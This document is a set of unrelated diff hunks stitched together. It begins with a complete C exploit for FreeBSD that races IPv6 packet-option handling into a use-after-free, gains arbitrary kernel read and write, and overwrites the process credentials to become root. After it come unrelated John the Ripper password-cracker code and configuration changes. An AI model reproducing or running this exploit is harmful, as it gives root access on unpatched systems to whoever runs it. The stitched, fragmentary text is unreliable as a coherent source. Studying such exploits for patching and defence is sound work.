+#define PKTOPTS_TCLASS_OFFSET (offsetof(struct ip6_pktopts, ip6po_tclass))
+
+#define PROC_LIST_OFFSET (offsetof(struct proc, p_list))
+#define PROC_UCRED_OFFSET (offsetof(struct proc, p_ucred))
+#define PROC_FD_OFFSET (offsetof(struct proc, p_fd))
+#define PROC_PID_OFFSET (offsetof(struct proc, p_pid))
+
+#ifdef FBSD12
+
+#define FILEDESC_FILES_OFFSET (offsetof(struct filedesc, fd_files))
+#define FILEDESCENTTBL_OFILES_OFFSET (offsetof(struct fdescenttbl, fdt_ofiles))
+#define FILEDESCENTTBL_NFILES_OFFSET (offsetof(struct fdescenttbl, fdt_nfiles))
+#define FILEDESCENT_FILE_OFFSET (offsetof(struct filedescent, fde_file))
+#define FILE_TYPE_OFFSET (offsetof(struct file, f_type))
+#define FILE_DATA_OFFSET (offsetof(struct file, f_data))
+
+#else
+
+#define FILEDESC_OFILES_OFFSET (offsetof(struct filedesc, fd_ofiles))
+#define FILEDESC_NFILES_OFFSET (offsetof(struct filedesc, fd_nfiles))
+#define FILE_TYPE_OFFSET (offsetof(struct file, f_type))
+#define FILE_DATA_OFFSET (offsetof(struct file, f_data))
+
+#endif
+
+#define KNOTE_FOP_OFFSET (offsetof(struct knote, kn_fop))
+#define FILTEROPS_DETACH_OFFSET (offsetof(struct filterops, f_detach))
+
+#define SOCKET_PCB_OFFSET (offsetof(struct socket, so_pcb))
+#define INPCB_OUTPUTOPTS_OFFSET (offsetof(struct inpcb, in6p_outputopts))
+
+int kqueue(void);
+int kevent(int kq, const struct kevent *changelist, int nchanges,
+           struct kevent *eventlist, int nevents,
+           const struct timespec *timeout);
+
+static uint64_t kernel_base;
+static uint64_t p_ucred, p_fd;
+static uint64_t kevent_addr, pktopts_addr;
+
+static int triggered = 0;
+static int kevent_sock, master_sock, overlap_sock, victim_sock;
+static int spray_sock[NUM_SPRAY];
+static int kq[NUM_KQUEUES];
+
+static void hexDump(const void *data, size_t size) {
+  size_t i;
+  for(i = 0; i < size; i++) {
+    printf("%02hhX%c", ((char *)data)[i], (i + 1) % 16 ? ' ' : '\n');
+  }
+  printf("\n");
+}
+
+static int new_socket(void) {
+  return socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
+}
+
+static void build_tclass_cmsg(char *buf, int val) {
+  struct cmsghdr *cmsg;
+
+  cmsg = (struct cmsghdr *)buf;
+  cmsg->cmsg_len = CMSG_LEN(sizeof(int));
+  cmsg->cmsg_level = IPPROTO_IPV6;
+  cmsg->cmsg_type = IPV6_TCLASS;
+
+  *(int *)CMSG_DATA(cmsg) = val;
+}
+
+static int build_rthdr_msg(char *buf, int size) {
+  struct ip6_rthdr *rthdr;
+  int len;
+
+  len = ((size >> 3) - 1) & ~1;
+  size = (len + 1) << 3;
+
+  memset(buf, 0, size);
+
+  rthdr = (struct ip6_rthdr *)buf;
+  rthdr->ip6r_nxt = 0;
+  rthdr->ip6r_len = len;
+  rthdr->ip6r_type = IPV6_RTHDR_TYPE_0;
+  rthdr->ip6r_segleft = rthdr->ip6r_len >> 1;
+
+  return size;
+}
+
+static int get_rthdr(int s, char *buf, socklen_t len) {
+  return getsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, &len);
+}
+
+static int set_rthdr(int s, char *buf, socklen_t len) {
+  return setsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
+}
+
+static int free_rthdr(int s) {
+  return set_rthdr(s, NULL, 0);
+}
+
+static int get_tclass(int s) {
+  int val;
+  socklen_t len = sizeof(val);
+  getsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, &len);
+  return val;
+}
+
+static int set_tclass(int s, int val) {
+  return setsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, sizeof(val));
+}
+
+static int get_pktinfo(int s, char *buf) {
+  socklen_t len = sizeof(struct in6_pktinfo);
+  return getsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, &len);
+}
+
+static int set_pktinfo(int s, char *buf) {
+  return setsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, sizeof(struct in6_pktinfo));
+}
+
+static int set_pktopts(int s, char *buf, socklen_t len) {
+  return setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, len);
+}
+
+static int free_pktopts(int s) {
+  return set_pktopts(s, NULL, 0);
+}
+
+static uint64_t leak_rthdr_ptr(int s) {
+  char buf[0x100];
+  get_rthdr(s, buf, sizeof(buf));
+  return *(uint64_t *)(buf + PKTOPTS_RTHDR_OFFSET);
+}
+
+static uint64_t leak_kmalloc(char *buf, int size) {
+  int rthdr_len = build_rthdr_msg(buf, size);
+  set_rthdr(master_sock, buf, rthdr_len);
+#ifdef FBSD12
+  get_rthdr(master_sock, buf, rthdr_len);
+  return *(uint64_t *)(buf + 0x00);
+#else
+  return leak_rthdr_ptr(overlap_sock);
+#endif
+}
+
+static void write_to_victim(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  *(uint64_t *)(buf + 0x00) = addr;
+  *(uint64_t *)(buf + 0x08) = 0;
+  *(uint32_t *)(buf + 0x10) = 0;
+  set_pktinfo(master_sock, buf);
+}
+
+static int find_victim_sock(void) {
+  char buf[sizeof(struct in6_pktinfo)];
+
+  write_to_victim(pktopts_addr + PKTOPTS_PKTINFO_OFFSET);
+
+  for (int i = 0; i < NUM_SPRAY; i++) {
+    get_pktinfo(spray_sock[i], buf);
+    if (*(uint64_t *)(buf + 0x00) != 0)
+      return i;
+  }
+
+  return -1;
+}
+
+static uint8_t kread8(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  write_to_victim(addr);
+  get_pktinfo(victim_sock, buf);
+  return *(uint8_t *)buf;
+}
+
+static uint16_t kread16(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  write_to_victim(addr);
+  get_pktinfo(victim_sock, buf);
+  return *(uint16_t *)buf;
+}
+
+static uint32_t kread32(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  write_to_victim(addr);
+  get_pktinfo(victim_sock, buf);
+  return *(uint32_t *)buf;
+}
+
+static uint64_t kread64(uint64_t addr) {
+  char buf[sizeof(struct in6_pktinfo)];
+  write_to_victim(addr);
+  get_pktinfo(victim_sock, buf);
+  return *(uint64_t *)buf;
+}
+
+static void kread(void *dst, uint64_t src, size_t len) {
+  for (int i = 0; i < len; i++)
+    ((uint8_t *)dst)[i] = kread8(src + i);
+}
+
+static void kwrite64(uint64_t addr, uint64_t val) {
+  int fd = open("/dev/kmem", O_RDWR);
+  if (fd >= 0) {
+    lseek(fd, addr, SEEK_SET);
+    write(fd, &val, sizeof(val));
+    close(fd);
+  }
+}
+
+static int kwrite(uint64_t addr, void *buf) {
+  write_to_victim(addr);
+  return set_pktinfo(victim_sock, buf);
+}
+
+static uint64_t find_kernel_base(uint64_t addr) {
+  addr &= ~(PAGE_SIZE - 1);
+  while (kread32(addr) != ELF_MAGIC)
+    addr -= PAGE_SIZE;
+  return addr;
+}
+
+static int find_proc_cred_and_fd(pid_t pid) {
+  uint64_t proc = kread64(kernel_base + ALLPROC_OFFSET);
+
+  while (proc) {
+    if (kread32(proc + PROC_PID_OFFSET) == pid) {
+      p_ucred = kread64(proc + PROC_UCRED_OFFSET);
+      p_fd = kread64(proc + PROC_FD_OFFSET);
+      printf("[+] p_ucred: 0x%lx\n", p_ucred);
+      printf("[+] p_fd: 0x%lx\n", p_fd);
+      return 0;
+    }
+
+    proc = kread64(proc + PROC_LIST_OFFSET);
+  }
+
+  return -1;
+}
+
+#ifdef FBSD12
+
+static uint64_t find_socket_data(int s) {
+  uint64_t files, ofiles, fp;
+  int nfiles;
+  short type;
+
+  files = kread64(p_fd + FILEDESC_FILES_OFFSET);
+  if (!files)
+    return 0;
+
+  ofiles = files + FILEDESCENTTBL_OFILES_OFFSET;
+
+  nfiles = kread32(files + FILEDESCENTTBL_NFILES_OFFSET);
+  if (s < 0 || s >= nfiles)
+    return 0;
+
+  fp = kread64(ofiles + s * sizeof(struct filedescent) + FILEDESCENT_FILE_OFFSET);
+  if (!fp)
+    return 0;
+
+  type = kread16(fp + FILE_TYPE_OFFSET);
+  if (type != DTYPE_SOCKET)
+    return 0;
+
+  return kread64(fp + FILE_DATA_OFFSET);
+}
+
+#else
+
+static uint64_t find_socket_data(int s) {
+  uint64_t ofiles, fp;
+  int nfiles;
+  short type;
+
+  ofiles = kread64(p_fd + FILEDESC_OFILES_OFFSET);
+  if (!ofiles)
+    return 0;
+
+  nfiles = kread32(p_fd + FILEDESC_NFILES_OFFSET);
+  if (s < 0 || s >= nfiles)
+    return 0;
+
+  fp = kread64(ofiles + s * sizeof(struct file *));
+  if (!fp)
+    return 0;
+
+  type = kread16(fp + FILE_TYPE_OFFSET);
+  if (type != DTYPE_SOCKET)
+    return 0;
+
+  return kread64(fp + FILE_DATA_OFFSET);
+}
+
+#endif
+
+static uint64_t find_socket_pcb(int s) {
+  uint64_t f_data;
+
+  f_data = find_socket_data(s);
+  if (!f_data)
+    return 0;
+
+  return kread64(f_data + SOCKET_PCB_OFFSET);
+}
+
+static uint64_t find_socket_pktopts(int s) {
+  uint64_t in6p;
+
+  in6p = find_socket_pcb(s);
+  if (!in6p)
+    return 0;
+
+  return kread64(in6p + INPCB_OUTPUTOPTS_OFFSET);
+}
+
+static void cleanup(void) {
+  uint64_t master_pktopts, overlap_pktopts, victim_pktopts;
+
+  master_pktopts  = find_socket_pktopts(master_sock);
+  overlap_pktopts = find_socket_pktopts(overlap_sock);
+  victim_pktopts  = find_socket_pktopts(victim_sock);
+
+  kwrite64(master_pktopts  + PKTOPTS_PKTINFO_OFFSET, 0);
+  kwrite64(overlap_pktopts + PKTOPTS_RTHDR_OFFSET, 0);
+  kwrite64(victim_pktopts  + PKTOPTS_PKTINFO_OFFSET, 0);
+}
+
+static void escalate_privileges(void) {
+  char buf[sizeof(struct in6_pktinfo)];
+
+  *(uint32_t *)(buf + 0x00) = 0; // cr_uid
+  *(uint32_t *)(buf + 0x04) = 0; // cr_ruid
+  *(uint32_t *)(buf + 0x08) = 0; // cr_svuid
+  *(uint32_t *)(buf + 0x0c) = 1; // cr_ngroups
+  *(uint32_t *)(buf + 0x10) = 0; // cr_rgid
+
+  kwrite(p_ucred + 4, buf);
+}
+
+static int find_overlap_sock(void) {
+  set_tclass(master_sock, TCLASS_TAINT);
+
+  for (int i = 0; i < NUM_SPRAY; i++) {
+    if (get_tclass(spray_sock[i]) == TCLASS_TAINT)
+      return i;
+  }
+
+  return -1;
+}
+
+static int spray_pktopts(void) {
+  for (int i = 0; i < NUM_SPRAY_RACE; i++)
+    set_tclass(spray_sock[i], TCLASS_SPRAY);
+
+  if (get_tclass(master_sock) == TCLASS_SPRAY)
+    return 1;
+
+  for (int i = 0; i < NUM_SPRAY_RACE; i++)
+    free_pktopts(spray_sock[i]);
+
+  return 0;
+}
+
+static void *use_thread(void *arg) {
+  char buf[CMSG_SPACE(sizeof(int))];
+  build_tclass_cmsg(buf, 0);
+
+  while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) {
+    set_pktopts(master_sock, buf, sizeof(buf));
+
+#ifdef FBSD12
+     usleep(100);
+#endif
+  }
+
+  triggered = 1;
+  return NULL;
+}
+
+static void *free_thread(void *arg) {
+  while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) {
+    free_pktopts(master_sock);
+
+#ifdef FBSD12
+    if (spray_pktopts())
+      break;
+#endif
+
+    usleep(100);
+  }
+
+  triggered = 1;
+  return NULL;
+}
+
+static int trigger_uaf(void) {
+  pthread_t th[2];
+
+  pthread_create(&th[0], NULL, use_thread, NULL);
+  pthread_create(&th[1], NULL, free_thread, NULL);
+
+  while (1) {
+    if (spray_pktopts())
+      break;
+
+#ifndef FBSD12
+    usleep(100);
+#endif
+  }
+
+  triggered = 1;
+
+  pthread_join(th[0], NULL);
+  pthread_join(th[1], NULL);
+
+  return find_overlap_sock();
+}
+
+static int fake_pktopts(uint64_t pktinfo) {
+  char buf[0x100];
+  int rthdr_len, tclass;
+
+  // Free master_sock's pktopts
+  free_pktopts(overlap_sock);
+
+  // Spray rthdr's to refill master_sock's pktopts
+  rthdr_len = build_rthdr_msg(buf, 0x100);
+  for (int i = 0; i < NUM_SPRAY; i++) {
+    *(uint64_t *)(buf + PKTOPTS_PKTINFO_OFFSET) = pktinfo;
+    *(uint32_t *)(buf + PKTOPTS_TCLASS_OFFSET)  = TCLASS_MASTER | i;
+    set_rthdr(spray_sock[i], buf, rthdr_len);
+  }
+
+  tclass = get_tclass(master_sock);
+
+  // See if pktopts has been refilled correctly
+  if ((tclass & 0xffff0000) != TCLASS_MASTER) {
+    printf("[-] Error could not refill pktopts.\n");
+    exit(1);
+  }
+
+  return tclass & 0xffff;
+}
+
+static void leak_kevent_pktopts(void) {
+  char buf[0x800];
+
+  struct kevent kv;
+  EV_SET(&kv, kevent_sock, EVFILT_READ, EV_ADD, 0, 5, NULL);
+
+  // Free pktopts
+  for (int i = 0; i < NUM_SPRAY; i++)
+    free_pktopts(spray_sock[i]);
+
+  // Leak 0x800 kmalloc addr
+  kevent_addr = leak_kmalloc(buf, 0x800);
+  printf("[+] kevent_addr: 0x%lx\n", kevent_addr);
+
+  // Free rthdr buffer and spray kevents to occupy this location
+  free_rthdr(master_sock);
+  for (int i = 0; i < NUM_KQUEUES; i++)
+    kevent(kq[i], &kv, 1, 0, 0, 0);
+
+  // Leak 0x100 kmalloc addr
+  pktopts_addr = leak_kmalloc(buf, 0x100);
+  printf("[+] pktopts_addr: 0x%lx\n", pktopts_addr);
+
+  // Free rthdr buffer and spray pktopts to occupy this location
+  free_rthdr(master_sock);
+  for (int i = 0; i < NUM_SPRAY; i++)
+    set_tclass(spray_sock[i], 0);
+}
+
+int main(int argc, char *argv[]) {
+  uint64_t knote, kn_fop, f_detach;
+  int idx;
+
+  printf("[*] Initializing sockets...\n");
+
+  kevent_sock = new_socket();
+  master_sock = new_socket();
+
+  for (int i = 0; i < NUM_SPRAY; i++)
+    spray_sock[i] = new_socket();
+
+  for (int i = 0; i < NUM_KQUEUES; i++)
+    kq[i] = kqueue();
+
+  printf("[*] Triggering UAF...\n");
+  idx = trigger_uaf();
+  if (idx == -1) {
+    printf("[-] Error could not find overlap sock.\n");
+    exit(1);
+  }
+
+  // master_sock and overlap_sock point to the same pktopts
+  overlap_sock = spray_sock[idx];
+  spray_sock[idx] = new_socket();
+  printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
+
+  // Reallocate pktopts
+  for (int i = 0; i < NUM_SPRAY; i++) {
+    free_pktopts(spray_sock[i]);
+    set_tclass(spray_sock[i], 0);
+  }
+
+  // Fake master pktopts
+  idx = fake_pktopts(0);
+  overlap_sock = spray_sock[idx];
+  spray_sock[idx] = new_socket(); // use new socket so logic in spraying will be easier
+  printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
+
+  // Leak address of some kevent and pktopts
+  leak_kevent_pktopts();
+
+  // Fake master pktopts
+  idx = fake_pktopts(pktopts_addr + PKTOPTS_PKTINFO_OFFSET);
+  overlap_sock = spray_sock[idx];
+  printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
+
+  idx = find_victim_sock();
+  if (idx == -1) {
+    printf("[-] Error could not find victim sock.\n");
+    exit(1);
+  }
+
+  victim_sock = spray_sock[idx];
+  printf("[+] Victim socket: %x (%x)\n", victim_sock, idx);
+
+  printf("[+] Arbitrary R/W achieved.\n");
+
+  knote    = kread64(kevent_addr + kevent_sock * sizeof(uintptr_t));
+  kn_fop   = kread64(knote + KNOTE_FOP_OFFSET);
+  f_detach = kread64(kn_fop + FILTEROPS_DETACH_OFFSET);
+
+  printf("[+] knote: 0x%lx\n", knote);
+  printf("[+] kn_fop: 0x%lx\n", kn_fop);
+  printf("[+] f_detach: 0x%lx\n", f_detach);
+
+  printf("[+] Finding kernel base...\n");
+  kernel_base = find_kernel_base(f_detach);
+  printf("[+] Kernel base: 0x%lx\n", kernel_base);
+
+  printf("[+] Finding process cred and fd...\n");
+  find_proc_cred_and_fd(getpid());
+
+  printf("[*] Escalating privileges...\n");
+  escalate_privileges();
+
+  printf("[*] Cleaning up...\n");
+  cleanup();
+
+  printf("[+] Done.\n");
+
+  return 0;
+}
@@ -36,9 +36,6 @@ void init()
 	else
 		maxlength = 2;

-	# UTF-8 representation is up to 3x the character length
-	if (maxlength * 3 > cipher_limit)
-		maxlength = (cipher_limit + 2) / 3;
 /*
 * This defines the character set. This is auto-generated from UnicodeData.txt
 * and we skip control characters.
@@ -41,9 +41,6 @@ void init()
 	else
 		maxlength = 2;

-	# UTF-8 representation is up to 4x the character length
-	if (maxlength * 4 > cipher_limit)
-		maxlength = (cipher_limit + 3) / 4;
 /*
 * This defines the character set. This is auto-generated from UnicodeData.txt
 * and we skip control characters.
@@ -92,7 +92,7 @@ Test=$dynamic_2005$e7222e806a8ce5efa6d48acb3aa56dc2$aaaaa:test3
 TestD=$dynamic_2005$ba5528ac65c20213e105bb02e6aaf6a2$1234567890123456789012345678901234567890:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890

 [List.Generic:dynamic_2006]
-Expression=md5(md5($p).$s) (PW > 55 bytes)
+Expression=md5(md5($p).$s) (vBulletin, PW > 55 bytes or/and salt > 23 bytes)
 Flag=MGF_SALTED
 Flag=MGF_KEYS_BASE16_IN1
 Flag=MGF_FLAT_BUFFERS
@@ -1,6 +1,6 @@
 #
 # This file is part of John the Ripper password cracker,
-# Copyright (c) 1996-2006,2008-2013 by Solar Designer
+# Copyright (c) 1996-2006,2008-2013,2019 by Solar Designer
 #
 # Redistribution and use in source and binary forms, with or without
 # modification, are permitted.
@@ -42,9 +42,11 @@ SingleRules = Single
 # Default batch mode Wordlist rules
 BatchModeWordlistRules = Wordlist

-# Default wordlist mode rules when not in batch mode (if any)
-# If this is set and you want to run once without rules, use --rules:none
-#WordlistRules = Wordlist
+# Default wordlist mode rules when not in batch mode (if any).  If this is
+# changed from an 'empty list' to have default rules applied, and you later
+# DO want to perform a run once without rules, use --rules:none on the
+# command line.  The default is 'empty' or NO rules run at all.
+WordlistRules =

 # Default loopback mode rules (if any)
 # If this is set and you want to run once without rules, use --rules:none
@@ -54,14 +56,11 @@ LoopbackRules = Loopback
 # before suppressing the warnings.
 MaxKPCWarnings = 10

-# If set to true, relax the KPC warning checks and only warn for really
-# bad situations (the fewer salts, the more slack).
-RelaxKPCWarningCheck = N
-
 # Default/batch mode Incremental mode
 # Warning: changing these might currently break resume on existing sessions
+# one option frequently changed (with above caveat) is setting DefaultIncrementalUTF8 = UTF8
 DefaultIncremental = ASCII
-#DefaultIncrementalUTF8 = UTF8
+DefaultIncrementalUTF8 = ASCII
 DefaultIncrementalLM = LM_ASCII

 # Time formatting string used in status ETA.
@@ -85,19 +84,29 @@ TimeFormat24 = %H:%M:%S
 # strftime for more information:
 # http://en.cppreference.com/w/c/chrono/strftime
 #
+# examples:
 # 2016-02-20T22:35:38+01:00 would be %Y-%m-%dT%H:%M:%S%z
 # Feb 20 22:35:38           would be %b %d %H:%M:%S
-#LogDateFormat = %Y-%m-%dT%H:%M:%S%z
+LogDateFormat =

 # if log date is being used, the time will default to local
-# time.  But if the next line is uncommented, it will output
+# time.  But if the next line is changed to 'Y', date output
 # in UTC.  Note, if LogDateFormat is not set, this option
-# does nothing.
-#LogDateFormatUTC = Y
+# is ignored.
+LogDateFormatUTC = N

 # if logging to stderr (--log-stderr command line switch used),
 # then use date format when outputting to the stderr.
-#LogDateStderrFormat = %b %d %H:%M:%S
+#
+# example
+# Feb 20 22:35:38           would be %b %d %H:%M:%S
+LogDateStderrFormat =
+
+# If this is given, it will be printed in the end on any cracked password
+# output. In case some 8-bit passwords upset your terminal, putting an
+# ANSI "SGR Reset/Normal" here might be a cure. Any "^" characters will be
+# parsed as ESC for use in ANSI codes (like in the default)
+TerminalReset = ^[0m

 # This can be used to colorize (on screen) or otherwise emphasize (in log
 # files) output whenever a supposed administrator password gets cracked.
@@ -108,9 +117,12 @@ MarkAdminCracks = Y
 # If MarkAdminCracks = Y above, the below will be used (if defined) for
 # terminal output. The default is to change color to red before the username
 # and reset to normal after it. Any "^" characters will be parsed as ESC for
-# use in ANSI codes (like in the defaults)
-MarkAdminStart = ^[31m
+# use in ANSI codes (like in the defaults).
+# The "MarkOther" entries will make non-admin stuff brown.
+MarkAdminStart = ^[0;31m
 MarkAdminEnd = ^[0m
+MarkOtherStart = ^[0;33m
+MarkOtherEnd = ^[0m

 # If MarkAdminCracks = Y above, the below will be used (if defined) for logs.
 # This literal string will be printed after the " + Cracked: root" line.
@@ -118,16 +130,16 @@ MarkAdminString = (ADMIN ACCOUNT)

 # Permissions to set for session.log file
 # Default is 0600
-#LogFilePermissions = 0600
+LogFilePermissions = 0600

 # Permissions to set for POT file
 # Default is 0600
-#PotFilePermissions = 0600
+PotFilePermissions = 0600

 # John exits if another user owns log or pot file because CHMOD fails,
 # If this is set John prints a warning and continues
 # Default is N
-#IgnoreChmodErrors = N
+IgnoreChmodErrors = N

 # This figure is in MB. The default is to memory map wordlists not larger
 # than one terabyte.
@@ -159,16 +171,25 @@ SingleSkipLogin = N
 # by word seed options --single-seed and/or --single-wordlist if needed.
 SingleWordsPairMax = 6

-# Un-commenting this stops Single mode from re-testing guessed plaintexts
+# Setting this to false stops Single mode from re-testing guessed plaintexts
 # with all other salts.
-#SingleRetestGuessed = N
+SingleRetestGuessed = Y
+
+# Max recursion depth for SingleRetestGuessed, so we don't blow the stack
+SingleMaxRecursionDepth = 10000

 # Set the maximum word buffer size used by Single mode. The default is
-# 4 GB. If running fork this is the *total* used by a session (size is
-# divided by number of forks). If running MPI, we try to determine the
-# number of local processes on each node and divide it accordingly.
+# 4 GB.  Note that you may want to set SingleMaxBufferAvailMem (below) to
+# true instead.
+#
+# If this figure is explicitly set to zero, and SingleMaxBufferAvailMem
+# is false, there will be NO LIMIT!
 SingleMaxBufferSize = 4

+# If true, the actual amount of physical memory at runtime, if known, will
+# override the figure from SingleMaxBufferSize (may increase or decrease!).
+SingleMaxBufferAvailMem = N
+
 # When running single mode with a GPU or accelerator, we prioritize speed
 # (saturating buffers) over resume ability:  When resuming such a session
 # it may take longer to catch up.  Set this option to Y to prioritize
@@ -183,7 +204,7 @@ SinglePrioResume = N
 # with a --session=xxxx will be protected from being overwritten. If
 # the option is set to "Always", then all .rec files will be kept from
 # being overwritten, even ${JOHN}/john.rec file
-#SessionFileProtect = Named
+SessionFileProtect = Disabled

 # Protect the log files (*.log) from being reused by new sessons.
 # The default mode is "Disabled". That means, a nee session will just append
@@ -196,7 +217,7 @@ SinglePrioResume = N
 # existing log file.)
 # Unless you use the --nolog option, setting LogFileProtect will also
 # prevent overwriting existing session files.
-#LogFileProtect = Named
+LogFileProtect = Disabled

 # Emit a status line whenever a password is cracked (this is the same as
 # passing the --crack-status option flag to john). NOTE: if this is set
@@ -208,6 +229,12 @@ CrackStatus = N
 # will be exact while the screen output will be a multiple of batch size).
 StatusShowCandidates = N

+# Show updated "Remaining" counts when we got rid of any salt(s).
+ShowSaltProgress = N
+
+# Show updated "Remaining" counts on status output (if it changed).
+ShowRemainOnStatus = N
+
 # Write cracked passwords to the log file (default is just the user name)
 LogCrackedPasswords = N

@@ -235,7 +262,7 @@ DefaultMSCodepage = CP850
 # is fastest. Using "UTF-8" (which is not a legacy codepage!) will disable.
 #
 # The default is to NOT use any internal codepage.
-#DefaultInternalCodepage = ISO-8859-1
+DefaultInternalCodepage =

 # Warn if seeing UTF-8 when expecting some other encoding, or vice versa.
 # This is disabled for ASCII or RAW encodings, for performance.
@@ -304,6 +331,8 @@ PauseFile = /var/run/john/pause
 #   With:     password123      (Administrator:500)
 #   Without   password123      (Administrator)
 # This is disabled by --save-memory.
+# NOTE: For WPAPSK, this will actually show gid instead, which is the MAC
+# address of the access point.
 ShowUIDinCracks = N

 # This sets the "grace time" for --max-run-time=N. If john has not finished
@@ -319,24 +348,6 @@ AbortGraceTime = 30
 # This may produce some false positives if enabled, at least for SAP-B.
 SAPhalfHashes = N

-# This allows you to list a few words/names that will be used by single mode
-# as if they were included in every GECOS field.  Use sparingly! Please note
-# that the example words are commented out, so the list is empty!
-[List.Single:SeedWords]
-#Pass
-#Secret
-#Test
-
-# This allows you to read extra pot files when loading hashes. Nothing will
-# ever be written to these files, they are just read. Any directory in this
-# list will be traversed and files in it with an extension of .pot will be
-# read. However there will NOT be any recursion down further directory levels.
-# Any entries that don't exist will be silently ignored.
-[List.Extra:Potfiles]
-#somefile.pot
-#somedirectory
-#$JOHN/my.pot
-
 [Options:CPUtune]
 # If preset is given, use it and skip autotune (NOTE: non-intel archs will
 # currently ignore this option and always autotune)
@@ -362,14 +373,6 @@ MPIOMPverbose = Y
 # Assume all MPI nodes are homogenous; Enforce same OpenCL workgroup sizes.
 MPIAllGPUsSame = N

-# These formats are disabled from all-formats --test runs, or auto-selection
-# of format from an input file. Even when disabled, you can use them as long
-# as you spell them out with the --format option. Or you can delete a line,
-# comment it out, or change to 'N'
-[Disabled:Formats]
-#formatname = Y
-.include '$JOHN/dynamic_disabled.conf'
-
 # Options that may affect both GPUs and other accelerators (eg. FPGA)
 [Options:GPU]
 # Show GPU temperature, fan and utilization along with normal status output
@@ -380,78 +383,30 @@ TempStatus = Y
 UtilStatus = N
 FanStatus = N

-# Abort session if GPU hits this temperature (in C)
+# Abort the process or sleep for a while if a GPU hits this temperature (in C)
 AbortTemperature = 95

-
-# ZTEX specific settings
-[ZTEX:descrypt]
-# The design has two programmable clocks. The 1st one is supplied to
-# pipelines of DES rounds, the 2nd clock is supplied to comparators.
-# Startup frequencies are 220,160.
-#Frequency = 220,160
-
-[ZTEX:bcrypt]
-# Define typical setting of hashes it's going to process. It allows
-# to adjust for best performance.
-TargetSetting = 6
-# Startup frequency for bcrypt-ztex is 140. Design tools guaranteed
-# 141.5 in worst-case temperature and voltage.
-Frequency = 141
-# It's possible to set frequency on per-board and per-fpga basis.
-#Frequency_04A36E0FD6 = 142
-#Frequency_04A36E0FD6_0 = 143
-#Frequency_04A36E0FD6_3 = 144
-
-[ZTEX:sha512crypt]
-#TargetRounds = 5000
-# Design tools reported possible frequency to be 215 MHz.
-# We never encountered a board where this worked anywhere close
-# to such high frequency. Default frequency is set to 160 MHz.
-# Some lucky boards might run at some higher frequency.
-Frequency = 160
-#Config1 = \x00\x00
-
-[ZTEX:Drupal7]
-#TargetRounds = 16384
-# Drupal7 uses same bitstream as sha512crypt, see comment regarding
-# default frequency in sha512crypt section.
-#Frequency = 160
-# Some bitstreams accept runtime configuration.
-# In sha512crypt/Drupal7, configuration is 2 bytes. That's interpreted
-# as a bitmask. By setting any of the lowest 10 bits to 1 it turns off
-# corresponding unit (there are 10 units in the bitstream).
-# This turns off units 0 and 1.
-#Config1 = \x03\x00
-# This turns off all 10 units (resulting in a timeout).
-#Config1_04A36E0FD6_0 = \xff\x03
-
-[ZTEX:sha256crypt]
-# Design tools reported possible frequency is 166.3 but tested boards
-# miss guesses, often fail unless frequency is decreased.
-#Frequency = 165
-Frequency = 135
-#TargetRounds = 1000000
-
-# md5crypt and phpass use same bitstream. Design tools reported
-# possible frequency is 202 MHz. Tested boards run OK at 180 MHz.
-[ZTEX:md5crypt]
-Frequency = 180
-
-[ZTEX:phpass]
-Frequency = 180
-#TargetRounds = 2048
+# Instead of aborting, sleep for this many seconds to cool the GPU down when
+# the temperature hits the AbortTemperature value, then re-test the temperature
+# and either wake up or go to sleep again.  Set this to 0 to actually abort.
+# Suppress repeated sleep/wakeup messages when SleepOnTemperature = 1, which we
+# interpret as intent to keep the GPU temperature around the limit.
+SleepOnTemperature = 1

 [Options:OpenCL]
-# Set default OpenCL device. Command line option will override this.
+# Set default OpenCL device(s). Command line option will override this.
 # If not set, we will search for a GPU or fall-back to the most
-# powerful device.
-#Device = 0
+# powerful device.  Syntax is same as --device option.
+Device =

-# If commented out and set to true, store LWS and GWS in session file for
-# later resume. Note that when resuming, this option is ignored: If the
-# session file was written with this option set, it will still be used.
-#ResumeWS = Y
+# *Always* show local/global work sizes (LWS/GWS).  This is mostly for
+# debugging, we try to show them when reasonable.
+AlwaysShowWorksizes = N
+
+# If set to true, store LWS and GWS in session file for later resume.
+# Note that when resuming, this option is ignored: If the session file
+# was written with this option set, it will still be used.
+ResumeWS = N

 # Global max. single kernel invocation duration, in ms. Setting this low
 # (eg. 10-100 ms) gives you a better responding desktop but lower performance.
@@ -459,7 +414,7 @@ Frequency = 180
 # may lag. Really high values may trip watchdogs (eg. 5 seconds). Some versions
 # of AMD Catalyst may hang if you go above 200 ms, and in general any good
 # kernel will perform optimally at 100-200 ms anyway.
-#Global_MaxDuration = 200
+Global_MaxDuration =

 # Some formats vectorize their kernels in case the device says it's a good
 # idea. Some devices give "improper" hints which means we vectorize but get
@@ -467,7 +422,7 @@ Frequency = 180
 # will disable vectorizing globally.
 # With this set to N (or commented out) you can force it per session with
 # the --force-scalar command-line option instead.
-#ForceScalar = Y
+ForceScalar = N

 # Global build options. Format-specific build options below may be
 # concatenated to this.
@@ -479,7 +434,6 @@ GlobalBuildOpts = -cl-mad-enable
 # Any other value (eg. 64) will be taken verbatim.
 AutotuneLWS = 1

-
 # Format-specific settings:

 # Uncomment the below for nvidia sm_30 and beyond.
@@ -529,11 +483,115 @@ sha512crypt_Bonaire = -DUNROLL_LOOP=132104
 # S -> supported
 # T -> not recommended: really bad software. I mean "trash".

+# ZTEX specific settings
+[List.ZTEX:Devices]
+# If you list Serial Numbers (SN) of ZTEX boards here, it will display
+# numbers (starting from 1) instead of factory programmed SN's.
+# These numbers can be used in --dev command-line option.
